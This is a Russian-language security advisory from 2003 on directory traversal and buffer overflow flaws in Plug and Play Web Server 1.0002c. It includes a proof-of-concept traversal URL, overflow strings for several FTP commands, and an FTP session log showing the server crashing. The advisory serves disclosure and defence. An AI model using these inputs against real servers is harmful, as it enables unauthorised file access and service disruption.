Security Lab

Переполнение буфера и доступ к произвольным файлам в Plug and Play Web Server

Дата публикации:22.09.2003
Всего просмотров:1185
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Раскрытие системных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Plug and Play Web Server 1.x
Уязвимые версии: Plug and Play Web Server 1.0002c

Описание: Две уязвимости обнаружено в Plug and Play Web Server. Злонамеренный пользователь может раскрыть чувствительную информацию и скомпрометировать уязвимую систему.

  1. Удаленный атакующий может использовать последовательность обхода каталога ("../" или "..\"), чтобы получить доступ к произвольным файлам вне wwwroot каталога.
  2. Переполнение буфера обнаружено в нескольких параметрах в командах dir, ls, delete, mkdir, DELE, RMD, и MKD. В результате удаленный атакующий может выполнить произвольный код на уязвимом сервере.

Пример/Эксплоит:

1.

http://[victim]/../../existing_file
2.
dir [Ax509]

ls [Ax509]

delete [Ax509]

mkdir [Ax509]

DELE [Ax509]

RMD [Ax509]

MKD [Ax509]

Example:
--------------------
ftp> o 127.0.0.1
Connected to 127.0.0.1.
220 Plug and Play Web Server V1.0
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in
ftp> dir AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
200 PORT command successful
Connection closed by remote host.
ftp> o 127.0.0.1
> ftp: connect :Unknown error number
ftp>
--------------------

URL производителя:http://www.pandpsoftware.com/

Решение: Ограничьте доступ к FTP серверу только доверенным пользователям. Запретите доступ анонимному Web пользователю к чувствительным файлам на системе на уровне файловой системы.

Ссылки: Denial Of Service in Plug & Play Web (FTP) Server